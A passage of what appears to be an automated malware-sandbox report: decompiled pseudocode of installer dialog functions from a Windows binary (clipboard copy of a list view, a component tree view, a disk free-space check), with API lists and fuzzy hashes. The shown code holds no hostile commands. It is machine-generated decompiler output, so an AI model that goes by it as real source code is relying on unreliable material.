                                            							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
                                            							_t92 = _a16;
                                            							__eflags = _t92 - 0xffffffff;
                                            							if(_t92 != 0xffffffff) {
                                            								_t150 = _t92;
                                            								_t93 = _t92 >> 0x10;
                                            								__eflags = _t93;
                                            								_t94 = _t93;
                                            							} else {
                                            								GetWindowRect(_t154,  &_v28);
                                            								_t150 = _v28.left;
                                            								_t94 = _v28.top;
                                            							}
                                            							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                            							_t162 = 1;
                                            							__eflags = _t95 - 1;
                                            							if(_t95 == 1) {
                                            								_v60 = _t149;
                                            								_v48 = 0x420538;
                                            								_v44 = 0xfff;
                                            								_a4 = _a8;
                                            								do {
                                            									_a4 = _a4 - 1;
                                            									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                            									__eflags = _a4 - _t149;
                                            									_t162 = _t162 + _t98 + 2;
                                            								} while (_a4 != _t149);
                                            								OpenClipboard(_t149);
                                            								EmptyClipboard();
                                            								_t101 = GlobalAlloc(0x42, _t162);
                                            								_a4 = _t101;
                                            								_t163 = GlobalLock(_t101);
                                            								do {
                                            									_v48 = _t163;
                                            									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                            									 *_t164 = 0xa0d;
                                            									_t163 = _t164 + 2;
                                            									_t149 = _t149 + 1;
                                            									__eflags = _t149 - _a8;
                                            								} while (_t149 < _a8);
                                            								GlobalUnlock(_a4);
                                            								SetClipboardData(1, _a4);
                                            								CloseClipboard();
                                            							}
                                            							goto L37;
                                            						}
                                            						__eflags =  *0x42370c - _t149; // 0x0
                                            						if(__eflags == 0) {
                                            							ShowWindow( *0x423f48, 8);
                                            							__eflags =  *0x423fcc - _t149; // 0x0
                                            							if(__eflags == 0) {
                                            								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
                                            							}
                                            							E00403E2D(1);
                                            							goto L25;
                                            						}
                                            						 *0x41f900 = 2;
                                            						E00403E2D(0x78);
                                            						goto L20;
                                            					} else {
                                            						__eflags = _a12 - 0x403;
                                            						if(_a12 != 0x403) {
                                            							L20:
                                            							return E00403EBB(_a8, _a12, _a16);
                                            						}
                                            						ShowWindow( *0x423710, _t149);
                                            						ShowWindow(_t154, 8);
                                            						E00403E89(_t154);
                                            						goto L17;
                                            					}
                                            				}
                                            				_v52 = _v52 | 0xffffffff;
                                            				_v40 = _v40 | 0xffffffff;
                                            				_v60 = 2;
                                            				_v56 = 0;
                                            				_v48 = 0;
                                            				_v44 = 0;
                                            				asm("stosd");
                                            				asm("stosd");
                                            				_t123 =  *0x423f50; // 0x661638
                                            				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                            				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                            				 *0x423710 = GetDlgItem(_a4, 0x403);
                                            				 *0x423708 = GetDlgItem(_a4, 0x3ee);
                                            				_t127 = GetDlgItem(_a4, 0x3f8);
                                            				 *0x423724 = _t127;
                                            				_v8 = _t127;
                                            				E00403E89( *0x423710);
                                            				 *0x423714 = E00404726(4);
                                            				 *0x42372c = 0;
                                            				GetClientRect(_v8,  &_v28);
                                            				_v52 = _v28.right - GetSystemMetrics(0x15);
                                            				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                            				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                            				if(_a8 >= 0) {
                                            					SendMessageA(_v8, 0x1001, 0, _a8);
                                            					SendMessageA(_v8, 0x1026, 0, _a8);
                                            				}
                                            				if(_a12 >= _t149) {
                                            					SendMessageA(_v8, 0x1024, _t149, _a12);
                                            				}
                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                            				_push(0x1b);
                                            				E00403E54(_a4);
                                            				if(( *0x423f58 & 0x00000003) != 0) {
                                            					ShowWindow( *0x423710, _t149);
                                            					if(( *0x423f58 & 0x00000002) != 0) {
                                            						 *0x423710 = _t149;
                                            					} else {
                                            						ShowWindow(_v8, 8);
                                            					}
                                            					E00403E89( *0x423708);
                                            				}
                                            				_t158 = GetDlgItem(_a4, 0x3ec);
                                            				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                            				if(( *0x423f58 & 0x00000004) != 0) {
                                            					SendMessageA(_t158, 0x409, _t149, _a12);
                                            					SendMessageA(_t158, 0x2001, _t149, _a8);
                                            				}
                                            				goto L37;
                                            			}


































                                            0x00405142
                                            0x0040514b
                                            0x0040515b
                                            0x00405167
                                            0x00405167
                                            0x00000000

                                            APIs
                                            • GetDlgItem.USER32 ref: 00405021
                                            • GetDlgItem.USER32 ref: 00405030
                                            • GetClientRect.USER32 ref: 0040506D
                                            • GetSystemMetrics.USER32 ref: 00405075
                                            • SendMessageA.USER32 ref: 00405096
                                            • SendMessageA.USER32 ref: 004050A7
                                            • SendMessageA.USER32 ref: 004050BA
                                            • SendMessageA.USER32 ref: 004050C8
                                            • SendMessageA.USER32 ref: 004050DB
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                            • ShowWindow.USER32(?,00000008), ref: 00405111
                                            • GetDlgItem.USER32 ref: 00405132
                                            • SendMessageA.USER32 ref: 00405142
                                            • SendMessageA.USER32 ref: 0040515B
                                            • SendMessageA.USER32 ref: 00405167
                                            • GetDlgItem.USER32 ref: 0040503F
                                              • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                            • GetDlgItem.USER32 ref: 00405184
                                            • CreateThread.KERNEL32 ref: 00405192
                                            • CloseHandle.KERNEL32(00000000), ref: 00405199
                                            • ShowWindow.USER32(00000000), ref: 004051BD
                                            • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                            • ShowWindow.USER32(00000008), ref: 00405209
                                            • SendMessageA.USER32 ref: 0040523B
                                            • CreatePopupMenu.USER32 ref: 0040524C
                                            • AppendMenuA.USER32 ref: 00405261
                                            • GetWindowRect.USER32 ref: 00405274
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                            • SendMessageA.USER32 ref: 004052D3
                                            • OpenClipboard.USER32(00000000), ref: 004052E3
                                            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004052E9
                                            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                            • GlobalLock.KERNEL32 ref: 004052FC
                                            • SendMessageA.USER32 ref: 00405310
                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                            • SetClipboardData.USER32 ref: 00405333
                                            • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405339
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {
                                            • API String ID: 590372296-366298937
                                            • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                            • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                            • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                            • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                            				struct HWND__* _v8;
                                            				struct HWND__* _v12;
                                            				signed int _v16;
                                            				intOrPtr _v20;
                                            				void* _v24;
                                            				long _v28;
                                            				int _v32;
                                            				signed int _v40;
                                            				int _v44;
                                            				signed int* _v56;
                                            				intOrPtr _v60;
                                            				signed int _v64;
                                            				long _v68;
                                            				void* _v72;
                                            				intOrPtr _v76;
                                            				intOrPtr _v80;
                                            				void* _v84;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				struct HWND__* _t182;
                                            				intOrPtr _t183;
                                            				int _t189;
                                            				int _t196;
                                            				intOrPtr _t198;
                                            				long _t202;
                                            				signed int _t206;
                                            				signed int _t217;
                                            				void* _t220;
                                            				void* _t221;
                                            				int _t227;
                                            				intOrPtr _t231;
                                            				signed int _t232;
                                            				signed int _t233;
                                            				signed int _t240;
                                            				signed int _t242;
                                            				signed int _t245;
                                            				signed int _t247;
                                            				struct HBITMAP__* _t250;
                                            				void* _t252;
                                            				char* _t268;
                                            				signed char _t269;
                                            				long _t274;
                                            				int _t280;
                                            				signed int* _t281;
                                            				int _t282;
                                            				long _t283;
                                            				signed int* _t284;
                                            				int _t285;
                                            				long _t286;
                                            				signed int _t287;
                                            				long _t288;
                                            				signed int _t291;
                                            				int _t294;
                                            				signed int _t298;
                                            				signed int _t300;
                                            				signed int _t302;
                                            				intOrPtr _t309;
                                            				int* _t310;
                                            				void* _t311;
                                            				int _t315;
                                            				int _t316;
                                            				int _t317;
                                            				signed int _t318;
                                            				void* _t320;
                                            				void* _t328;
                                            				void* _t331;
                                            
                                            				_v12 = GetDlgItem(_a4, 0x3f9);
                                            				_t182 = GetDlgItem(_a4, 0x408);
                                            				_t280 =  *0x423f68; // 0x6617e4
                                            				_t320 = SendMessageA;
                                            				_v8 = _t182;
                                            				_t183 =  *0x423f50; // 0x661638
                                            				_t315 = 0;
                                            				_v32 = _t280;
                                            				_v20 = _t183 + 0x94;
                                            				if(_a8 != 0x110) {
                                            					L23:
                                            					__eflags = _a8 - 0x405;
                                            					if(_a8 != 0x405) {
                                            						_t289 = _a16;
                                            					} else {
                                            						_a12 = _t315;
                                            						_t289 = 1;
                                            						_a8 = 0x40f;
                                            						_a16 = 1;
                                            					}
                                            					__eflags = _a8 - 0x4e;
                                            					if(_a8 == 0x4e) {
                                            						L28:
                                            						__eflags = _a8 - 0x413;
                                            						_v16 = _t289;
                                            						if(_a8 == 0x413) {
                                            							L30:
                                            							__eflags =  *0x423f59 & 0x00000002;
                                            							if(( *0x423f59 & 0x00000002) != 0) {
                                            								L41:
                                            								__eflags = _v16 - _t315;
                                            								if(_v16 != _t315) {
                                            									_t232 = _v16;
                                            									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                            									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                            										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                            									}
                                            									_t233 = _v16;
                                            									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                            									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                            										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                            										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                            											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                            											 *_t284 =  *_t284 & 0xffffffdf;
                                            											__eflags =  *_t284;
                                            										} else {
                                            											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                            										}
                                            									}
                                            								}
                                            								goto L48;
                                            							}
                                            							__eflags = _a8 - 0x413;
                                            							if(_a8 == 0x413) {
                                            								L33:
                                            								__eflags = _a8 - 0x413;
                                            								_t289 = 0 | _a8 != 0x00000413;
                                            								_t240 = E00404753(_v8, _a8 != 0x413);
                                            								__eflags = _t240 - _t315;
                                            								if(_t240 >= _t315) {
                                            									_t93 = _t280 + 8; // 0x8
                                            									_t310 = _t240 * 0x418 + _t93;
                                            									_t289 =  *_t310;
                                            									__eflags = _t289 & 0x00000010;
                                            									if((_t289 & 0x00000010) == 0) {
                                            										__eflags = _t289 & 0x00000040;
                                            										if((_t289 & 0x00000040) == 0) {
                                            											_t298 = _t289 ^ 0x00000001;
                                            											__eflags = _t298;
                                            										} else {
                                            											_t300 = _t289 ^ 0x00000080;
                                            											__eflags = _t300;
                                            											if(_t300 >= 0) {
                                            												_t298 = _t300 & 0xfffffffe;
                                            											} else {
                                            												_t298 = _t300 | 0x00000001;
                                            											}
                                            										}
                                            										 *_t310 = _t298;
                                            										E0040117D(_t240);
                                            										_t242 =  *0x423f58; // 0x80
                                            										_t289 = 1;
                                            										_a8 = 0x40f;
                                            										_t245 =  !_t242 >> 0x00000008 & 1;
                                            										__eflags = _t245;
                                            										_a12 = 1;
                                            										_a16 = _t245;
                                            									}
                                            								}
                                            								goto L41;
                                            							}
                                            							_t289 = _a16;
                                            							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                            							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                            								goto L41;
                                            							}
                                            							goto L33;
                                            						}
                                            						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                            						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                            							goto L48;
                                            						}
                                            						goto L30;
                                            					} else {
                                            						__eflags = _a8 - 0x413;
                                            						if(_a8 != 0x413) {
                                            							L48:
                                            							__eflags = _a8 - 0x111;
                                            							if(_a8 != 0x111) {
                                            								L56:
                                            								__eflags = _a8 - 0x200;
                                            								if(_a8 == 0x200) {
                                            									SendMessageA(_v8, 0x200, _t315, _t315);
                                            								}
                                            								__eflags = _a8 - 0x40b;
                                            								if(_a8 == 0x40b) {
                                            									_t220 =  *0x420514;
                                            									__eflags = _t220 - _t315;
                                            									if(_t220 != _t315) {
                                            										ImageList_Destroy(_t220);
                                            									}
                                            									_t221 =  *0x42052c;
                                            									__eflags = _t221 - _t315;
                                            									if(_t221 != _t315) {
                                            										GlobalFree(_t221);
                                            									}
                                            									 *0x420514 = _t315;
                                            									 *0x42052c = _t315;
                                            									 *0x423fa0 = _t315;
                                            								}
                                            								__eflags = _a8 - 0x40f;
                                            								if(_a8 != 0x40f) {
                                            									L86:
                                            									__eflags = _a8 - 0x420;
                                            									if(_a8 == 0x420) {
                                            										__eflags =  *0x423f59 & 0x00000001;
                                            										if(( *0x423f59 & 0x00000001) != 0) {
                                            											__eflags = _a16 - 0x20;
                                            											_t189 = (0 | _a16 == 0x00000020) << 3;
                                            											__eflags = _t189;
                                            											_t316 = _t189;
                                            											ShowWindow(_v8, _t316);
                                            											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                            										}
                                            									}
                                            									goto L89;
                                            								} else {
                                            									E004011EF(_t289, _t315, _t315);
                                            									__eflags = _a12 - _t315;
                                            									if(_a12 != _t315) {
                                            										E0040140B(8);
                                            									}
                                            									__eflags = _a16 - _t315;
                                            									if(_a16 == _t315) {
                                            										L73:
                                            										E004011EF(_t289, _t315, _t315);
                                            										__eflags =  *0x423f6c - _t315; // 0x2
                                            										_v32 =  *0x42052c;
                                            										_t196 =  *0x423f68; // 0x6617e4
                                            										_v60 = 0xf030;
                                            										_v16 = _t315;
                                            										if(__eflags <= 0) {
                                            											L84:
                                            											InvalidateRect(_v8, _t315, 1);
                                            											_t198 =  *0x42371c; // 0x666dd3
                                            											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                            											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                            												E0040470E(0x3ff, 0xfffffffb, E00404726(5));
                                            											}
                                            											goto L86;
                                            										} else {
                                            											_t142 = _t196 + 8; // 0x6617ec
                                            											_t281 = _t142;
                                            											do {
                                            												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                            												__eflags = _t202 - _t315;
                                            												if(_t202 != _t315) {
                                            													_t291 =  *_t281;
                                            													_v68 = _t202;
                                            													__eflags = _t291 & 0x00000001;
                                            													_v72 = 8;
                                            													if((_t291 & 0x00000001) != 0) {
                                            														_t151 =  &(_t281[4]); // 0x6617fc
                                            														_v72 = 9;
                                            														_v56 = _t151;
                                            														_t154 =  &(_t281[0]);
                                            														 *_t154 = _t281[0] & 0x000000fe;
                                            														__eflags =  *_t154;
                                            													}
                                            													__eflags = _t291 & 0x00000040;
                                            													if((_t291 & 0x00000040) == 0) {
                                            														_t206 = (_t291 & 0x00000001) + 1;
                                            														__eflags = _t291 & 0x00000010;
                                            														if((_t291 & 0x00000010) != 0) {
                                            															_t206 = _t206 + 3;
                                            															__eflags = _t206;
                                            														}
                                            													} else {
                                            														_t206 = 3;
                                            													}
                                            													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                            													__eflags = _t294;
                                            													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                            													SendMessageA(_v8, 0x1102, _t294, _v68);
                                            													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                            												}
                                            												_v16 = _v16 + 1;
                                            												_t281 =  &(_t281[0x106]);
                                            												__eflags = _v16 -  *0x423f6c; // 0x2
                                            											} while (__eflags < 0);
                                            											goto L84;
                                            										}
                                            									} else {
                                            										_t282 = E004012E2( *0x42052c);
                                            										E00401299(_t282);
                                            										_t217 = 0;
                                            										_t289 = 0;
                                            										__eflags = _t282 - _t315;
                                            										if(_t282 <= _t315) {
                                            											L72:
                                            											SendMessageA(_v12, 0x14e, _t289, _t315);
                                            											_a16 = _t282;
                                            											_a8 = 0x420;
                                            											goto L73;
                                            										} else {
                                            											goto L69;
                                            										}
                                            										do {
                                            											L69:
                                            											_t309 = _v20;
                                            											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                            											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                            												_t289 = _t289 + 1;
                                            												__eflags = _t289;
                                            											}
                                            											_t217 = _t217 + 1;
                                            											__eflags = _t217 - _t282;
                                            										} while (_t217 < _t282);
                                            										goto L72;
                                            									}
                                            								}
                                            							}
                                            							__eflags = _a12 - 0x3f9;
                                            							if(_a12 != 0x3f9) {
                                            								goto L89;
                                            							}
                                            							__eflags = _a12 >> 0x10 - 1;
                                            							if(_a12 >> 0x10 != 1) {
                                            								goto L89;
                                            							}
                                            							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                            							__eflags = _t227 - 0xffffffff;
                                            							if(_t227 == 0xffffffff) {
                                            								goto L89;
                                            							}
                                            							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                            							__eflags = _t283 - 0xffffffff;
                                            							if(_t283 == 0xffffffff) {
                                            								L54:
                                            								_t283 = 0x20;
                                            								L55:
                                            								E00401299(_t283);
                                            								SendMessageA(_a4, 0x420, _t315, _t283);
                                            								_a12 = 1;
                                            								_a16 = _t315;
                                            								_a8 = 0x40f;
                                            								goto L56;
                                            							}
                                            							_t231 = _v20;
                                            							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                            							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                            								goto L55;
                                            							}
                                            							goto L54;
                                            						}
                                            						goto L28;
                                            					}
                                            				} else {
                                            					 *0x423fa0 = _a4;
                                            					_t247 =  *0x423f6c; // 0x2
                                            					_t285 = 2;
                                            					_v28 = 0;
                                            					_v16 = _t285;
                                            					 *0x42052c = GlobalAlloc(0x40, _t247 << 2);
                                            					_t250 = LoadBitmapA( *0x423f40, 0x6e);
                                            					 *0x420520 =  *0x420520 | 0xffffffff;
                                            					_v24 = _t250;
                                            					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
                                            					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                            					 *0x420514 = _t252;
                                            					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                            					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
                                            					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                            						SendMessageA(_v8, 0x111b, 0x10, 0);
                                            					}
                                            					DeleteObject(_v24);
                                            					_t286 = 0;
                                            					do {
                                            						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                            						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                            							if(_t286 != 0x20) {
                                            								_v16 = _t315;
                                            							}
                                            							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
                                            						}
                                            						_t286 = _t286 + 1;
                                            					} while (_t286 < 0x21);
                                            					_t317 = _a16;
                                            					_t287 = _v16;
                                            					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                            					_push(0x15);
                                            					E00403E54(_a4);
                                            					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                            					_push(0x16);
                                            					E00403E54(_a4);
                                            					_t318 = 0;
                                            					_t288 = 0;
                                            					_t328 =  *0x423f6c - _t318; // 0x2
                                            					if(_t328 <= 0) {
                                            						L19:
                                            						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                            						goto L20;
                                            					} else {
                                            						_t311 = _v32 + 8;
                                            						_v24 = _t311;
                                            						do {
                                            							_t268 = _t311 + 0x10;
                                            							if( *_t268 != 0) {
                                            								_v60 = _t268;
                                            								_t269 =  *_t311;
                                            								_t302 = 0x20;
                                            								_v84 = _t288;
                                            								_v80 = 0xffff0002;
                                            								_v76 = 0xd;
                                            								_v64 = _t302;
                                            								_v40 = _t318;
                                            								_v68 = _t269 & _t302;
                                            								if((_t269 & 0x00000002) == 0) {
                                            									__eflags = _t269 & 0x00000004;
                                            									if((_t269 & 0x00000004) == 0) {
                                            										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                            									} else {
                                            										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                            									}
                                            								} else {
                                            									_v76 = 0x4d;
                                            									_v44 = 1;
                                            									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                            									_v28 = 1;
                                            									 *( *0x42052c + _t318 * 4) = _t274;
                                            									_t288 =  *( *0x42052c + _t318 * 4);
                                            								}
                                            							}
                                            							_t318 = _t318 + 1;
                                            							_t311 = _v24 + 0x418;
                                            							_t331 = _t318 -  *0x423f6c; // 0x2
                                            							_v24 = _t311;
                                            						} while (_t331 < 0);
                                            						if(_v28 != 0) {
                                            							L20:
                                            							if(_v16 != 0) {
                                            								E00403E89(_v8);
                                            								_t280 = _v32;
                                            								_t315 = 0;
                                            								__eflags = 0;
                                            								goto L23;
                                            							} else {
                                            								ShowWindow(_v12, 5);
                                            								E00403E89(_v12);
                                            								L89:
                                            								return E00403EBB(_a8, _a12, _a16);
                                            							}
                                            						}
                                            						goto L19;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                            • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                            • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                            • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				long _v16;
                                            				long _v20;
                                            				long _v24;
                                            				char _v28;
                                            				intOrPtr _v32;
                                            				long _v36;
                                            				char _v40;
                                            				unsigned int _v44;
                                            				signed int _v48;
                                            				CHAR* _v56;
                                            				intOrPtr _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				CHAR* _v72;
                                            				void _v76;
                                            				struct HWND__* _v80;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr _t82;
                                            				long _t87;
                                            				signed char* _t89;
                                            				void* _t95;
                                            				signed int _t96;
                                            				int _t109;
                                            				signed short _t114;
                                            				signed int _t118;
                                            				struct HWND__** _t122;
                                            				intOrPtr _t124;
                                            				intOrPtr* _t138;
                                            				CHAR* _t146;
                                            				intOrPtr _t147;
                                            				unsigned int _t150;
                                            				signed int _t152;
                                            				unsigned int _t156;
                                            				signed int _t158;
                                            				signed int* _t159;
                                            				struct HWND__* _t165;
                                            				struct HWND__* _t166;
                                            				int _t168;
                                            				unsigned int _t197;
                                            
                                            				_t156 = __edx;
                                            				_t82 =  *0x41fd08;
                                            				_v32 = _t82;
                                            				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                            				if(_a8 == 0x40b) {
                                            					E0040543D(0x3fb, _t146);
                                            					E00405DFA(_t146);
                                            				}
                                            				_t166 = _a4;
                                            				if(_a8 != 0x110) {
                                            					L8:
                                            					if(_a8 != 0x111) {
                                            						L20:
                                            						if(_a8 == 0x40f) {
                                            							L22:
                                            							_v8 = _v8 & 0x00000000;
                                            							_v12 = _v12 & 0x00000000;
                                            							E0040543D(0x3fb, _t146);
                                            							if(E0040576C(_t185, _t146) == 0) {
                                            								_v8 = 1;
                                            							}
                                            							E00405B98(0x41f500, _t146);
                                            							_t87 = E00405F28(1);
                                            							_v16 = _t87;
                                            							if(_t87 == 0) {
                                            								L30:
                                            								E00405B98(0x41f500, _t146);
                                            								_t89 = E0040571F(0x41f500);
                                            								_t158 = 0;
                                            								if(_t89 != 0) {
                                            									 *_t89 =  *_t89 & 0x00000000;
                                            								}
                                            								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                            									goto L35;
                                            								} else {
                                            									_t168 = 0x400;
                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                            									asm("cdq");
                                            									_v48 = _t109;
                                            									_v44 = _t156;
                                            									_v12 = 1;
                                            									goto L36;
                                            								}
                                            							} else {
                                            								_t159 = 0;
                                            								if(0 == 0x41f500) {
                                            									goto L30;
                                            								} else {
                                            									goto L26;
                                            								}
                                            								while(1) {
                                            									L26:
                                            									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
                                            									if(_t114 != 0) {
                                            										break;
                                            									}
                                            									if(_t159 != 0) {
                                            										 *_t159 =  *_t159 & _t114;
                                            									}
                                            									_t159 = E004056D2(0x41f500) - 1;
                                            									 *_t159 = 0x5c;
                                            									if(_t159 != 0x41f500) {
                                            										continue;
                                            									} else {
                                            										goto L30;
                                            									}
                                            								}
                                            								_t150 = _v44;
                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                            								_v44 = _t150 >> 0xa;
                                            								_v12 = 1;
                                            								_t158 = 0;
                                            								__eflags = 0;
                                            								L35:
                                            								_t168 = 0x400;
                                            								L36:
                                            								_t95 = E00404726(5);
                                            								if(_v12 != _t158) {
                                            									_t197 = _v44;
                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                            										_v8 = 2;
                                            									}
                                            								}
                                            								_t147 =  *0x42371c; // 0x666dd3
                                            								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                            									E0040470E(0x3ff, 0xfffffffb, _t95);
                                            									if(_v12 == _t158) {
                                            										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
                                            									} else {
                                            										E00404649(_t168, 0xfffffffc, _v48, _v44);
                                            									}
                                            								}
                                            								_t96 = _v8;
                                            								 *0x423fe4 = _t96;
                                            								if(_t96 == _t158) {
                                            									_v8 = E0040140B(7);
                                            								}
                                            								if(( *(_v32 + 0x14) & _t168) != 0) {
                                            									_v8 = _t158;
                                            								}
                                            								E00403E76(0 | _v8 == _t158);
                                            								if(_v8 == _t158 &&  *0x420524 == _t158) {
                                            									E00404227();
                                            								}
                                            								 *0x420524 = _t158;
                                            								goto L53;
                                            							}
                                            						}
                                            						_t185 = _a8 - 0x405;
                                            						if(_a8 != 0x405) {
                                            							goto L53;
                                            						}
                                            						goto L22;
                                            					}
                                            					_t118 = _a12 & 0x0000ffff;
                                            					if(_t118 != 0x3fb) {
                                            						L12:
                                            						if(_t118 == 0x3e9) {
                                            							_t152 = 7;
